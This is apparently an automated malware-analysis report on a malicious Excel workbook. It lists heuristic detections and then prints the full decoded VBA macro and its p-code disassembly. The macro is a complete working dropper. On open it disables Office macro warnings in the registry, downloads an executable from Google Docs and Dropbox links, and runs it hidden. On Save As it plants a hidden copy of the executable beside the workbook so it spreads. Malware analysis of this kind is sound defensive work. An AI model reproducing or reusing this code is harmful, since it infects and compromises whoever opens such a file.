MALICIOUS
398
Risk Score
Heuristics 11
-
ClamAV: Xls.Downloader.Orcinius-10029360-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Orcinius-10029360-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell TMP, vbHide -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set myWS = CreateObject("WScript.Shell") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
oStream.Write WinHttpReq.ResponseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set FSO = CreateObject("scripting.filesystemobject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe" -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.customs.gov.cn/customs/302427/302442/tgcs/gjrhbftgcscxjxz/index.html Referenced by macro
- http://service.gdciq.gov.cn:8000/jyzhxx/member/攁挀椀焀⼀稀开戀戀搀开挀椀焀开栀猀开挀漀搀攀⼀椀渀搀攀砀⸀樀栀琀洀氀Referenced by macro
- https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download�Referenced by macro
- https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1�Referenced by macro
- https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadReferenced by macro
- https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20940 bytes |
SHA-256: 0f35b4d8c70aa9c6d79e011584171b38636cfcbf1f771669e8c4ca9bbe354bf2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim SheetsChanged As Boolean
Dim SheetCount As Integer
Private Sub Workbook_Open()
Dim i As Integer
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
Application.DisplayAlerts = False
SheetCount = Worksheets.Count
Call MPS
ActiveWorkbook.Sheets(1).Select
SheetsChanged = False
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
If Not SheetsChanged Then
ActiveWorkbook.Saved = True
End If
End Sub
Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
SheetsChanged = True
End Sub
Private Sub Workbook_NewSheet(ByVal Sh As Object)
SheetsChanged = True
End Sub
Private Sub Workbook_SheetActivate(ByVal Sh As Object)
If ActiveWorkbook.Sheets.Count <> SheetCount Then
SheetsChanged = True
SheetCount = ActiveWorkbook.Sheets.Count
End If
End Sub
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
Dim i As Integer
Dim AIndex As Integer
Dim FName
AIndex = ActiveWorkbook.ActiveSheet.Index
If SaveAsUI = False Then
Cancel = True
Application.EnableEvents = False
Application.ScreenUpdating = False
For i = 1 To ActiveWorkbook.Sheets.Count - 1
ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
Next i
ActiveWorkbook.Save
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
ActiveWorkbook.Sheets(AIndex).Select
SheetsChanged = False
Application.ScreenUpdating = True
Application.EnableEvents = True
Else
Cancel = True
Application.EnableEvents = False
Application.ScreenUpdating = False
For i = 1 To ActiveWorkbook.Sheets.Count - 1
ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
Next i
FName = Application.GetSaveAsFilename(fileFilter:="Excel 莂l��ma Kitab� (*.xlsm), *.xlsm")
If FName <> False Then
ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
SaveAsInj ActiveWorkbook.Path
End If
For i = 1 To ActiveWorkbook.Sheets.Count
ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
Next i
ActiveWorkbook.Sheets(AIndex).Select
SheetsChanged = False
Application.ScreenUpdating = True
Application.EnableEvents = True
End If
End Sub
Sub SaveAsInj(DIR As String)
Dim FSO As Object
Dim FN As String
Set FSO = CreateObject("scripting.filesystemobject")
FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
If FSO.FileExists(FN) Then
If Not FSO.FileExists(DIR & "\~$cache1") Then
FileCopy FN, DIR & "\~$cache1"
End If
SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
End If
End Sub
Function RegKeyRead(i_RegKey As String) As String
Dim myWS As Object
On Error Resume Next
Set myWS = CreateObject("WScript.Shell")
RegKeyRead = myWS.RegRead(i_RegKey)
End Function
Function RegKeyExists(i_RegKey As String) As Boolean
Dim myWS As Object
On Error GoTo ErrorHandler
Set myWS = CreateObject("WScript.Shell")
myWS.RegRead i_RegKey
RegKeyExists = True
Exit Function
ErrorHandler:
RegKeyExists = False
End Function
Sub RegKeySave(i_RegKey As String, _
i_Value As String, _
Optional i_Type As String = "REG_SZ")
Dim myWS As Object
Set myWS = CreateObject("WScript.Shell")
myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub
Sub MPS()
Dim FSO As Object
Dim FP(1 To 3), TMP, URL(1 To 3) As String
Set FSO = CreateObject("scripting.filesystemobject")
FP(1) = ActiveWorkbook.Path & "\~$cache1"
FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
TMP = Environ("Temp") & "\~$cache1.exe"
If FSO.FileExists(FP(1)) Then
If Not FSO.FileExists(TMP) Then
FileCopy FP(1), TMP
End If
Shell TMP, vbHide
ElseIf FSO.FileExists(FP(2)) Then
If Not FSO.FileExists(TMP) Then
FileCopy FP(2), TMP
End If
Shell TMP, vbHide
Else
If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
ElseIf Not FSO.FileExists(TMP) Then
If FDW((URL(1)), (TMP)) Then
ElseIf FDW((URL(2)), (TMP)) Then
ElseIf FDW((URL(3)), (TMP)) Then
End If
If FSO.FileExists(TMP) Then
Shell TMP, vbHide
End If
Else
Shell TMP, vbHide
End If
End If
End Sub
Function FDW(MYU, NMA As String) As Boolean
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
If WinHttpReq Is Nothing Then
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
End If
WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
WinHttpReq.Option(6) = AllowRedirects
WinHttpReq.Open "GET", MYU, False
WinHttpReq.Send
If (WinHttpReq.Status = 200) Then
If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
FDW = True
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.ResponseBody
oStream.SaveToFile (NMA)
oStream.Close
Else
FDW = False
End If
Else
FDW = False
End If
End Function
' Processing file: /opt/analyzer/scan_staging/afe2266196024661b4d3fb333c813af2.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 11862 bytes
' Line #0:
' Dim
' VarDefn SheetsChanged (As Boolean)
' Line #1:
' Dim
' VarDefn SheetCount (As Integer)
' Line #2:
' Line #3:
' FuncDefn (Private Sub Workbook_Open())
' Line #4:
' Dim
' VarDefn i (As Integer)
' Line #5:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' For
' Line #6:
' Ld xlSheetVisible
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #7:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #8:
' Line #9:
' LitStr 0x001F "HKCU\Software\Microsoft\Office\"
' Ld Application
' MemLd Version
' Concat
' LitStr 0x001B "\Excel\Security\VBAWarnings"
' Concat
' LitDI2 0x0001
' LitStr 0x0009 "REG_DWORD"
' ArgsCall RegKeySave 0x0003
' Line #10:
' LitStr 0x001F "HKCU\Software\Microsoft\Office\"
' Ld Application
' MemLd Version
' Concat
' LitStr 0x001A "\Word\Security\VBAWarnings"
' Concat
' LitDI2 0x0001
' LitStr 0x0009 "REG_DWORD"
' ArgsCall RegKeySave 0x0003
' Line #11:
' Line #12:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #13:
' Ld Worksheets
' MemLd Count
' St SheetCount
' Line #14:
' Line #15:
' ArgsCall (Call) MPS 0x0000
' Line #16:
' Line #17:
' LitDI2 0x0001
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' ArgsMemCall Select 0x0000
' Line #18:
' LitVarSpecial (False)
' St SheetsChanged
' Line #19:
' EndSub
' Line #20:
' Line #21:
' FuncDefn (Private Sub Workbook_BeforeClose(Cancel As Boolean))
' Line #22:
' Ld SheetsChanged
' Not
' IfBlock
' Line #23:
' LitVarSpecial (True)
' Ld ActiveWorkbook
' MemSt Saved
' Line #24:
' EndIfBlock
' Line #25:
' EndSub
' Line #26:
' Line #27:
' FuncDefn (Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As ))
' Line #28:
' LitVarSpecial (True)
' St SheetsChanged
' Line #29:
' EndSub
' Line #30:
' Line #31:
' FuncDefn (Private Sub Workbook_NewSheet(ByVal Sh As Object))
' Line #32:
' LitVarSpecial (True)
' St SheetsChanged
' Line #33:
' EndSub
' Line #34:
' Line #35:
' FuncDefn (Private Sub Workbook_SheetActivate(ByVal Sh As Object))
' Line #36:
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' Ld SheetCount
' Ne
' IfBlock
' Line #37:
' LitVarSpecial (True)
' St SheetsChanged
' Line #38:
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' St SheetCount
' Line #39:
' EndIfBlock
' Line #40:
' EndSub
' Line #41:
' Line #42:
' FuncDefn (Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean))
' Line #43:
' Dim
' VarDefn i (As Integer)
' Line #44:
' Dim
' VarDefn AIndex (As Integer)
' Line #45:
' Dim
' VarDefn FName
' Line #46:
' Line #47:
' Ld ActiveWorkbook
' MemLd ActiveSheet
' MemLd Index
' St AIndex
' Line #48:
' Line #49:
' Ld SaveAsUI
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #50:
' LitVarSpecial (True)
' St Cancel
' Line #51:
' LitVarSpecial (False)
' Ld Application
' MemSt EnableEvents
' Line #52:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #53:
' Line #54:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' LitDI2 0x0001
' Sub
' For
' Line #55:
' Ld xlSheetHidden
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #56:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #57:
' Ld ActiveWorkbook
' ArgsMemCall Save 0x0000
' Line #58:
' Line #59:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' For
' Line #60:
' Ld xlSheetVisible
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #61:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #62:
' Ld AIndex
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' ArgsMemCall Select 0x0000
' Line #63:
' LitVarSpecial (False)
' St SheetsChanged
' Line #64:
' Line #65:
' LitVarSpecial (True)
' Ld Application
' MemSt ScreenUpdating
' Line #66:
' LitVarSpecial (True)
' Ld Application
' MemSt EnableEvents
' Line #67:
' ElseBlock
' Line #68:
' LitVarSpecial (True)
' St Cancel
' Line #69:
' LitVarSpecial (False)
' Ld Application
' MemSt EnableEvents
' Line #70:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #71:
' Line #72:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' LitDI2 0x0001
' Sub
' For
' Line #73:
' Ld xlSheetHidden
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #74:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #75:
' Line #76:
' LitStr 0x0025 "Excel 莂l��ma Kitab� (*.xlsm), *.xlsm"
' ParamNamed fileFilter
' Ld Application
' ArgsMemLd GetSaveAsFilename 0x0001
' St FName
' Line #77:
' Ld FName
' LitVarSpecial (False)
' Ne
' IfBlock
' Line #78:
' Ld FName
' ParamNamed Filename
' Ld xlOpenXMLWorkbookMacroEnabled
' ParamNamed FileFormat
' Ld ActiveWorkbook
' ArgsMemCall SaveAs 0x0002
' Line #79:
' Ld ActiveWorkbook
' MemLd Path
' ArgsCall SaveAsInj 0x0001
' Line #80:
' EndIfBlock
' Line #81:
' Line #82:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveWorkbook
' MemLd Sheets
' MemLd Count
' For
' Line #83:
' Ld xlSheetVisible
' Ld i
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' MemSt Visible
' Line #84:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #85:
' Ld AIndex
' Ld ActiveWorkbook
' ArgsMemLd Sheets 0x0001
' ArgsMemCall Select 0x0000
' Line #86:
' LitVarSpecial (False)
' St SheetsChanged
' Line #87:
' Line #88:
' LitVarSpecial (True)
' Ld Application
' MemSt ScreenUpdating
' Line #89:
' LitVarSpecial (True)
' Ld Application
' MemSt EnableEvents
' Line #90:
' EndIfBlock
' Line #91:
' EndSub
' Line #92:
' Line #93:
' FuncDefn (Sub SaveAsInj(Dir As String))
' Line #94:
' Dim
' VarDefn FSO (As Object)
' Line #95:
' Dim
' VarDefn FN (As String)
' Line #96:
' Line #97:
' SetStmt
' LitStr 0x001A "scripting.filesystemobject"
' ArgsLd CreateObject 0x0001
' Set FSO
' Line #98:
' LitStr 0x000F "ALLUSERSPROFILE"
' ArgsLd Environ 0x0001
' LitStr 0x0018 "\Synaptics\Synaptics.exe"
' Concat
' St FN
' Line #99:
' Line #100:
' Ld FN
' Ld FSO
' ArgsMemLd FileExists 0x0001
' IfBlock
' Line #101:
' Ld Dir
' LitStr 0x0009 "\~$cache1"
' Concat
' Ld FSO
' ArgsMemLd FileExists 0x0001
' Not
' IfBlock
' Line #102:
' Ld FN
' Ld Dir
' LitStr 0x0009 "\~$cache1"
' Concat
' ArgsCall FileCopy 0x0002
' Line #103:
' EndIfBlock
' Line #104:
' Ld Dir
' LitStr 0x0009 "\~$cache1"
' Concat
' Paren
' Ld vbHidden
' Ld vbSystem
' Add
' ArgsCall SetAttr 0x0002
' Line #105:
' EndIfBlock
' Line #106:
' EndSub
' Line #107:
' Line #108:
' FuncDefn (Function RegKeyRead(i_RegKey As String, id_FFFE As String) As String)
' Line #109:
' Dim
' VarDefn myWS (As Object)
' Line #110:
' Line #111:
' OnError (Resume Next)
' Line #112:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' ArgsLd CreateObject 0x0001
' Set myWS
' Line #113:
' Ld i_RegKey
' Ld myWS
' ArgsMemLd RegRead 0x0001
' St RegKeyRead
' Line #114:
' EndFunc
' Line #115:
' Line #116:
' FuncDefn (Function RegKeyExists(i_RegKey As String, id_FFFE As Boolean) As Boolean)
' Line #117:
' Dim
' VarDefn myWS (As Object)
' Line #118:
' Line #119:
' OnError ErrorHandler
' Line #120:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' ArgsLd CreateObject 0x0001
' Set myWS
' Line #121:
' Ld i_RegKey
' Ld myWS
' ArgsMemCall RegRead 0x0001
' Line #122:
' LitVarSpecial (True)
' St RegKeyExists
' Line #123:
' ExitFunc
' Line #124:
' Line #125:
' Label ErrorHandler
' Line #126:
' LitVarSpecial (False)
' St RegKeyExists
' Line #127:
' EndFunc
' Line #128:
' Line #129:
' LineCont 0x0008 07 00 0F 00 0B 00 06 00
' ConstFuncExpr
' LitStr 0x0006 "REG_SZ"
' FuncDefn (Sub RegKeySave(i_RegKey As String, i_Value As String, Optional i_Type As String))
' Line #130:
' Dim
' VarDefn myWS (As Object)
' Line #131:
' Line #132:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' ArgsLd CreateObject 0x0001
' Set myWS
' Line #133:
' Ld i_RegKey
' Ld i_Value
' Ld i_Type
' Ld myWS
' ArgsMemCall RegWrite 0x0003
' Line #134:
' EndSub
' Line #135:
' Line #136:
' FuncDefn (Sub MPS())
' Line #137:
' Dim
' VarDefn FSO (As Object)
' Line #138:
' Dim
' LitDI2 0x0001
' LitDI2 0x0003
' VarDefn FP
' VarDefn TMP
' LitDI2 0x0001
' LitDI2 0x0003
' VarDefn URL (As String)
' Line #139:
' Line #140:
' SetStmt
' LitStr 0x001A "scripting.filesystemobject"
' ArgsLd CreateObject 0x0001
' Set FSO
' Line #141:
' Ld ActiveWorkbook
' MemLd Path
' LitStr 0x0009 "\~$cache1"
' Concat
' LitDI2 0x0001
' ArgsSt FP 0x0001
' Line #142:
' Ld ActiveWorkbook
' MemLd Path
' LitStr 0x000E "\Synaptics.exe"
' Concat
' LitDI2 0x0002
' ArgsSt FP 0x0001
' Line #143:
' Line #144:
' LitStr 0x004A "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
' LitDI2 0x0001
' ArgsSt URL 0x0001
' Line #145:
' LitStr 0x003C "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
' LitDI2 0x0002
' ArgsSt URL 0x0001
' Line #146:
' LitStr 0x003C "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
' LitDI2 0x0003
' ArgsSt URL 0x0001
' Line #147:
' LitStr 0x0004 "Temp"
' ArgsLd Environ 0x0001
' LitStr 0x000D "\~$cache1.exe"
' Concat
' St TMP
' Line #148:
' Line #149:
' LitDI2 0x0001
' ArgsLd FP 0x0001
' Ld FSO
' ArgsMemLd FileExists 0x0001
' IfBlock
' Line #150:
' Ld TMP
' Ld FSO
' ArgsMemLd FileExists 0x0001
' Not
' IfBlock
' Line #151:
' LitDI2 0x0001
' ArgsLd FP 0x0001
' Ld TMP
' ArgsCall FileCopy 0x0002
' Line #152:
' EndIfBlock
' Line #153:
' Ld TMP
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #154:
' LitDI2 0x0002
' ArgsLd FP 0x0001
' Ld FSO
' ArgsMemLd FileExists 0x0001
' ElseIfBlock
' Line #155:
' Ld TMP
' Ld FSO
' ArgsMemLd FileExists 0x0001
' Not
' IfBlock
' Line #156:
' LitDI2 0x0002
' ArgsLd FP 0x0001
' Ld TMP
' ArgsCall FileCopy 0x0002
' Line #157:
' EndIfBlock
' Line #158:
' Ld TMP
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #159:
' ElseBlock
' Line #160:
' LitStr 0x000F "ALLUSERSPROFILE"
' ArgsLd Environ 0x0001
' LitStr 0x0018 "\Synaptics\Synaptics.exe"
' Concat
' Ld FSO
' ArgsMemLd FileExists 0x0001
' IfBlock
' Line #161:
' LitStr 0x000F "ALLUSERSPROFILE"
' ArgsLd Environ 0x0001
' LitStr 0x0018 "\Synaptics\Synaptics.exe"
' Concat
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #162:
' LitStr 0x0006 "WINDIR"
' ArgsLd Environ 0x0001
' LitStr 0x0021 "\System32\Synaptics\Synaptics.exe"
' Concat
' Ld FSO
' ArgsMemLd FileExists 0x0001
' ElseIfBlock
' Line #163:
' LitStr 0x0006 "WINDIR"
' ArgsLd Environ 0x0001
' LitStr 0x0021 "\System32\Synaptics\Synaptics.exe"
' Concat
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #164:
' Ld TMP
' Ld FSO
' ArgsMemLd FileExists 0x0001
' Not
' ElseIfBlock
' Line #165:
' LitDI2 0x0001
' ArgsLd URL 0x0001
' Paren
' Ld TMP
' Paren
' ArgsLd FDW 0x0002
' IfBlock
' Line #166:
' LitDI2 0x0002
' ArgsLd URL 0x0001
' Paren
' Ld TMP
' Paren
' ArgsLd FDW 0x0002
' ElseIfBlock
' Line #167:
' LitDI2 0x0003
' ArgsLd URL 0x0001
' Paren
' Ld TMP
' Paren
' ArgsLd FDW 0x0002
' ElseIfBlock
' Line #168:
' EndIfBlock
' Line #169:
' Ld TMP
' Ld FSO
' ArgsMemLd FileExists 0x0001
' IfBlock
' Line #170:
' Ld TMP
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #171:
' EndIfBlock
' Line #172:
' ElseBlock
' Line #173:
' Ld TMP
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #174:
' EndIfBlock
' Line #175:
' Line #176:
' EndIfBlock
' Line #177:
' Line #178:
' EndSub
' Line #179:
' Line #180:
' FuncDefn (Function FDW(MYU, NMA As String, id_FFFE As Boolean) As Boolean)
' Line #181:
' SetStmt
' LitStr 0x001A "WinHttp.WinHttpRequest.5.1"
' ArgsLd CreateObject 0x0001
' Set WinHttpReq
' Line #182:
' Ld WinHttpReq
' LitNothing
' Is
' IfBlock
' Line #183:
' SetStmt
' LitStr 0x0018 "WinHttp.WinHttpRequest.5"
' ArgsLd CreateObject 0x0001
' Set WinHttpReq
' Line #184:
' EndIfBlock
' Line #185:
' Line #186:
' LitStr 0x0032 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
' LitDI2 0x0000
' Ld WinHttpReq
' ArgsMemSt Option 0x0001
' Line #187:
' Ld AllowRedirects
' LitDI2 0x0006
' Ld WinHttpReq
' ArgsMemSt Option 0x0001
' Line #188:
' LitStr 0x0003 "GET"
' Ld MYU
' LitVarSpecial (False)
' Ld WinHttpReq
' ArgsMemCall Open 0x0003
' Line #189:
' Ld WinHttpReq
' ArgsMemCall Send 0x0000
' Line #190:
' Line #191:
' Ld WinHttpReq
' MemLd Status
' LitDI2 0x00C8
' Eq
' Paren
' IfBlock
' Line #192:
' Ld WinHttpReq
' MemLd ResponseText
' LitStr 0x000D "404 Not Found"
' FnInStr
' LitDI2 0x0000
' Eq
' Paren
' Ld WinHttpReq
' MemLd ResponseText
' LitStr 0x000B ">Not Found<"
' FnInStr
' LitDI2 0x0000
' Eq
' Paren
' And
' Ld WinHttpReq
' MemLd ResponseText
' LitStr 0x000F "Dropbox - Error"
' FnInStr
' LitDI2 0x0000
' Eq
' Paren
' And
' IfBlock
' Line #193:
' LitVarSpecial (True)
' St FDW
' Line #194:
' SetStmt
' LitStr 0x000C "ADODB.Stream"
' ArgsLd CreateObject 0x0001
' Set oStream
' Line #195:
' Ld oStream
' ArgsMemCall Open 0x0000
' Line #196:
' LitDI2 0x0001
' Ld oStream
' MemSt Type
' Line #197:
' Ld WinHttpReq
' MemLd ResponseBody
' Ld oStream
' ArgsMemCall Xor 0x0001
' Line #198:
' Ld NMA
' Paren
' Ld oStream
' ArgsMemCall SaveToFile 0x0001
' Line #199:
' Ld oStream
' ArgsMemCall Close 0x0000
' Line #200:
' ElseBlock
' Line #201:
' LitVarSpecial (False)
' St FDW
' Line #202:
' EndIfBlock
' Line #203:
' ElseBlock
' Line #204:
' LitVarSpecial (False)
' St FDW
' Line #205:
' EndIfBlock
' Line #206:
' EndFunc
' Line #207:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.